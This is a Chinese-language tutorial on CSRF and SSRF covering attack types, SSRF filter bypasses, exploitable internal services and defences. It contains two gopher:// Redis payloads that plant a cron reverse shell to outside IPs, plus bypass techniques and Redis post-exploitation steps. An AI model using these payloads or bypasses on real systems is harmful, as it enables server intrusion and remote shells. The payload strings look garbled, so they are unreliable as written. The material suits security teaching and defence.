关于CSRF和SSRF的介绍

一、CSRF

1. 简介

• 跨站请求伪造 (Cross-Site Request Forgery, CSRF)，也被称为 One Click Attack 或者 Session Riding ，通常缩写为CSRF，是一种对网站的恶意利用。尽管听起来像XSS，但它与XSS非常不同，XSS利用站点内的信任用户，而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。

2. 分类

• 2.1. 资源包含

  • 资源包含是在大多数介绍CSRF概念的演示或基础课程中可能看到的类型。这种类型归结为控制HTML标签（例如<image>、<audio>、<video>、<object>、<script>等）所包含的资源的攻击者。如果攻击者能够影响URL被加载的话，包含远程资源的任何标签都可以完成攻击。
  • 由于缺少对Cookie的源点检查，如上所述，此攻击不需要XSS，可以由任何攻击者控制的站点或站点本身执行。此类型仅限于GET请求，因为这些是浏览器对资源URL唯一的请求类型。这种类型的主要限制是它需要错误地使用安全的HTTP请求方式。

• 2.2. 基于表单

  • 通常在正确使用安全的请求方式时看到。攻击者创建一个想要受害者提交的表单; 其包含一个JavaScript片段，强制受害者的浏览器提交。
  • 该表单可以完全由隐藏的元素组成，以致受害者很难发现它。
  • 如果处理cookies不当，攻击者可以在任何站点上发动攻击，只要受害者使用有效的cookie登录，攻击就会成功。如果请求是有目的性的，成功的攻击将使受害者回到他们平时正常的页面。该方法对于攻击者可以将受害者指向特定页面的网络钓鱼攻击特别有效。

• 2.3. XMLHttpRequest

  • XMLHttpRequest可能是最少看到的方式，由于许多现代Web应用程序依赖XHR，许多应用花费大量的时间来构建和实现这一特定的对策。
  • 基于XHR的CSRF通常由于SOP而以XSS有效载荷的形式出现。没有跨域资源共享策略 (Cross-Origin Resource Sharing, CORS)，XHR仅限于攻击者托管自己的有效载荷的原始请求。
  • 这种类型的CSRF的攻击有效载荷基本上是一个标准的XHR，攻击者已经找到了一些注入受害者浏览器DOM的方式。

3. 防御

• 通过CSRF-token或者验证码来检测用户提交

• 验证 Referer/Content-Type

• 对于用户修改删除等操作最好都使用POST操作

• 避免全站通用的Cookie，严格设置Cookie的域

4. 参考链接

• demo

• Wiping Out CSRF

• Neat tricks to bypass CSRF protection

二、SSRF

1. 简介

• 服务端请求伪造（Server Side Request Forgery, SSRF）指的是攻击者在未能取得服务器所有权限时，利用服务器漏洞以服务器的身份发送一条构造好的请求给服务器所在内网。SSRF攻击通常针对外部网络无法直接访问的内部系统。

1.1. 漏洞危害

• SSRF可以对外网、服务器所在内网、本地进行端口扫描，攻击运行在内网或本地的应用，或者利用File协议读取本地文件。

• 内网服务防御相对外网服务来说一般会较弱，甚至部分内网服务为了运维方便并没有对内网的访问设置权限验证，所以存在SSRF时，通常会造成较大的危害。

2. 利用方式

• SSRF利用存在多种形式以及不同的场景，针对不同场景可以使用不同的利用和绕过方式。

• 以curl为例, 可以使用dict协议操作Redis、file协议读文件、gopher协议反弹Shell等功能，常见的Payload如下：

  

• curl -vvv 'gopher://127.0.0.1:6379/_1%0d%0a$8%0d%0aflushall%0d%0a3%0d%0a3%0d%0aset%0d%0a33%0d%0aset%0d%0a31%0d%0a1%0d%0a64%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/103.21.140.84/6789 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a6464%0d%0a%0d%0a%0a%0a*/1 * * * * bash -i >& /dev/tcp/103.21.140.84/6789 0>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a646%0d%0aconfig%0d%0a3%0d%0aset%0d%0a33%0d%0aset%0d%0a33%0d%0adir%0d%0a16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a1616%0d%0a/var/spool/cron/%0d%0a*4%0d%0a166%0d%0aconfig%0d%0a3%0d%0aset%0d%0a33%0d%0aset%0d%0a310%0d%0adbfilename%0d%0a4%0d%0aroot%0d%0a*1%0d%0a44%0d%0aroot%0d%0a*1%0d%0a44%0d%0asave%0d%0aquit%0d%0a'

3. 相关危险函数

• SSRF涉及到的危险函数主要是网络访问，支持伪协议的网络读取。以PHP为例，涉及到的函数有 file_get_contents() / fsockopen() / curl_exec() 等。

4. 过滤绕过

4.1. 更改IP地址写法

• 8进制格式：0300.0250.0.1

• 16进制格式：0xC0.0xA8.0.1

• 10进制整数格式：3232235521

• 16进制整数格式：0xC0A80001

• 合并后两位：1.1.278 / 1.1.755

• 合并后三位：1.278 / 1.755 / 3.14159267

4.2. 使用解析到内网的域名

• 如果服务端没有先解析IP再过滤内网地址，我们就可以使用 localhost 等解析到内网的域名。

• 另外 xip.io 提供了一个方便的服务，这个网站的子域名会解析到对应的IP，例如192.168.0.1.xip.io，解析到192.168.0.1。

4.3. 利用解析URL所出现的问题

• 在某些情况下，后端程序可能会对访问的URL进行解析，对解析出来的host地址进行过滤。这时候可能会出现对URL参数解析不当，导致可以绕过过滤。

• 比如 百度一下，你就知道@192.168.0.1/ 当后端程序通过不正确的正则表达式（比如将http之后到com为止的字符内容，也就是www.baidu.com，认为是访问请求的host地址时）对上述URL的内容进行解析的时候，很有可能会认为访问URL的host为www.baidu.com，而实际上这个URL所请求的内容都是192.168.0.1上的内容。

4.4. 利用跳转

• 如果后端服务器在接收到参数后，正确的解析了URL的host，并且进行了过滤，我们这个时候可以使用跳转的方式来进行绕过。

• 可以使用如 http://httpbin.org/redirect-to?url=http://192.168.0.1 等服务跳转，但是由于URL中包含了192.168.0.1这种内网IP地址，可能会被正则表达式过滤掉，可以通过短地址的方式来绕过。

• 常用的跳转有302跳转和307跳转，区别在于307跳转会转发POST请求中的数据等，但是302跳转不会。

4.5. 通过各种非HTTP协议

• 如果服务器端程序对访问URL所采用的协议进行验证的话，可以通过非HTTP协议来进行利用。

• 比如通过gopher，可以在一个url参数中构造POST或者GET请求，从而达到攻击内网应用的目的。例如可以使用gopher协议对与内网的Redis服务进行攻击，可以使用如下的URL：

  

• gopher://127.0.0.1:6379/_1%0d%0a$8%0d%0aflushall%0d%0a3%0d%0a3%0d%0aset%0d%0a33%0d%0aset%0d%0a31%0d%0a1%0d%0a64%0d%0a%0d%0a%0a%0a*/1* * * * bash -i >& /dev/tcp/172.19.23.228/23330>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a6464%0d%0a%0d%0a%0a%0a*/1* * * * bash -i >& /dev/tcp/172.19.23.228/23330>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a646%0d%0aconfig%0d%0a3%0d%0aset%0d%0a33%0d%0aset%0d%0a33%0d%0adir%0d%0a16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a1616%0d%0a/var/spool/cron/%0d%0a*4%0d%0a166%0d%0aconfig%0d%0a3%0d%0aset%0d%0a33%0d%0aset%0d%0a310%0d%0adbfilename%0d%0a4%0d%0aroot%0d%0a*1%0d%0a44%0d%0aroot%0d%0a*1%0d%0a44%0d%0asave%0d%0aquit%0d%0a

• 除了gopher协议，File协议也是SSRF中常用的协议，该协议主要用于访问本地计算机中的文件，我们可以通过类似 file:///path/to/file 这种格式来访问计算机本地文件。使用file协议可以避免服务端程序对于所访问的IP进行的过滤。例如我们可以通过 file:///d:/1.txt 来访问D盘中1.txt的内容。

4.6. DNS Rebinding

• 服务器端获得URL参数，进行第一次DNS解析，获得了一个非内网的IP

• 对于获得的IP进行判断，发现为非黑名单IP，则通过验证

• 服务器端对于URL进行访问，由于DNS服务器设置的TTL为0，所以再次进行DNS解析，这一次DNS服务器返回的是内网地址。

• 由于已经绕过验证，所以服务器端返回访问内网资源的结果。

4.7. 利用IPv6

• 有些服务没有考虑IPv6的情况，但是内网又支持IPv6，则可以使用IPv6的本地IP如 [::] 0000::1 或IPv6的内网域名来绕过过滤。

4.8. 利用IDN

5. 可能的利用点

• 5.1. 内网服务

  • Apache Hadoop远程命令执行
  • axis2-admin部署Server命令执行
  • Confluence SSRF
  • counchdb WEB API远程命令执行
  • dict
  • docker API远程命令执行
  • Elasticsearch引擎Groovy脚本命令执行
  • ftp / ftps（FTP爆破）
  • glassfish任意文件读取和war文件部署间接命令执行
  • gopher
  • HFS远程命令执行
  • http、https
  • imap/imaps/pop3/pop3s/smtp/smtps（爆破邮件用户名密码）
  • Java调试接口命令执行
  • JBOSS远程Invoker war命令执行
  • Jenkins Scripts接口命令执行
  • ldap
  • mongodb
  • php_fpm/fastcgi 命令执行
  • rtsp - smb/smbs（连接SMB）
  • sftp
  • ShellShock 命令执行
  • Struts2 命令执行
  • telnet
  • tftp（UDP协议扩展）
  • tomcat命令执行
  • WebDav PUT上传任意文件
  • WebSphere Admin可部署war间接命令执行
  • zentoPMS远程命令执行

• 5.2. Redis利用

  • 写ssh公钥
  • 写crontab
  • 写WebShell
  • Windows写启动项
  • 主从复制加载 .so 文件
  • 主从复制写无损文件

• 5.3. 云主机

  • 在AWS、Google等云环境下，通过访问云环境的元数据API或管理API，在部分情况下可以实现敏感信息等效果。

6. 防御方式

• 过滤返回的信息

• 统一错误信息

• 限制请求的端口

• 禁止不常用的协议

• 对DNS Rebinding，考虑使用DNS缓存或者Host白名单

7. 参考链接

• SSRF漏洞分析与利用

• A New Era Of SSRF

• php ssrf technique

• 谈一谈如何在Python开发中拒绝SSRF漏洞

• SSRF Tips

• SSRF in PHP